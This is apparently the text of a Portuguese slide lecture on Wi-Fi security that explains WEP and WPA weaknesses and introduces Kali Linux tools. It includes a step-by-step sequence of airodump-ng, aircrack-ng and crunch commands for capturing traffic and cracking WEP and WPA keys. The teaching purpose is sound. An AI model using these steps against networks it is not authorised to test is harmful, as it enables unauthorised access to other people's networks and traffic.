Formao Engenharia de Telecomunicaes pela Faculdade do Noroeste de Minas FINOM (12/2009) Ps-Graduao Lato Sensu em Gesto Ambiental e Docncia do Ensino Superior pela Faculdade do Noroeste de Minas FINOM Ps-Graduao Lato Sensu em Engenharia de Segurana do Trabalho Qualificaes RH 033 - Red Hat Linux System Operation, RH 133 Red Hat Linux System Administration Segurana na Internet Almir Emlio 2 Almir Emlio 3 Almir Emlio 4 Vantagens: Facilidade de conexo Mobilidade Flexibilidade Problemas: Tamanho da banda Interferncia Alcane do Sinal SEGURANA Objetivos: Analisar as falhas das criptografias WEP e WPA, adotadas na segurana s redes Wi- Fi, analisando suas vulnerabilidades, as tcnicas de ataques e as ferramentas mais utilizadas. Almir Emlio 5 Protocolos de Segurana para redes Wi-Fi WEP (Wired Equivalent Privacy) - 1997 IV = 24 bits RC4 exemplo: 5 bytes = {(5 x 8bits) + 24 bits IV} chave de 64 bits Chave simtrica IV de 24 bits = = 16.777.216 CRC-32 no detecta erros que no modifiquem ICV Almir Emlio 6 Autenticao chave WEP Almir Emlio 7 WPA (Wi-Fi Protected Access) 2003 chaves TKIP (temporal Key Integrity Protocol) chaves PSK (Pre-Shared Key) IV de 48 bits ao invs de 24 bits autencicao de usurio WPA 2 (Wi-Fi Protected Access) 2004 chaves AES ( Advanced Encryption Standard) Almir Emlio 8 Protocolos de Segurana para redes Wi-Fi Apresentao Kali Linux Sucessor do Back Track, uma ferramenta voltada para testes de penetrao muito utilizado por auditores, analistas de segurana de redes e sistemas. mais de 300 ferramentas de testes de penetrao Kali Linux totalmente livre (software de cdigo aberto) Almir Emlio 9 Ferramentas de teste de penetrao airodump-ng: coloca o trfego do ar em um arquivo.cap e mostra informaes das redes ifconfig: mostra configuraes das placas instaladas no computador iwconfig: similar ao ifconfig, porem permite a troca de configuraes dos hardware das placas. Almir Emlio 10 Ferramentas de teste de penetrao aircrack-ng: quebra chaves WEP e WPA, usando fora bruta ou ataque de dicionrio. airplay-ng: injeo de pacotes na rede crunch: cria lista de palavras (wordlist), de acordo com parmetros especificados. Almir Emlio 11 Siglas: ESSID Extended service set identifier (Identificador de conjunto de servio protocolado) BSSID Basic Service Set Indentifier (Identificador de Ajuste de Servio Bsico) AP Access Point IP Internet Protocol MAC- Media Access Control (Controle de Acesso ) Almir Emlio 12 PASSO A PASSO comando: # ifconfig = verifica as interfaces ativas no pc Voc usar a interface sem fio. # ifconfig wlan0 down = derruba a interface de rede # iwconfig wlan0 mode monitor = coloca a interface em modo monitor # ifconfig wlan0 up = habilita novamente a interface de rede # airodump-ng wlan0 = mostra toda rede ao alcance da placa de rede sem fio Almir Emlio 13 PASSO A PASSO # airodump-ng --bssid (mac do Aces Point) c (canal da rede) w (nome do arquivo) wlan0 (interface) -> depois de juntar cerca de 20 mil pacotes pode usar o aircrack-ng --senha WEP # aircrack-ng y (nome do arquivo que vc capturou)- *.cap -> detalhe: no esquea de colocar a extenso do arquivo (-*.cap) Almir Emlio 14 PASSO A PASSO Depois disso s esperar o sistema descobrir a senha, o tempo varia de acordo com a quantidade de pacotes capturados (IV), e da complexidade da senha WEP. Almir Emlio 15 SENHA WPA Usa-se os mesmos comandos porem usa-se uma wordlist, podendo ser criada ou baixada. CRIAR WORDLIST = comando crunch Exemplo: #crunch 8 8 abcdef >> /root/nome Cria uma lista com no mnimo 8 caracteres e no mximo 8 caracteres, usando as letras abcdef >> /root/ = local onde ser criado a lista Nome: nome que voc escolhe para o arquivo Almir Emlio 16 USANDO AIRCRACK-NG COM SENHA WPA # aircrack-ng (arquivos capturados)-*.cap w (lista criada) Almir Emlio 17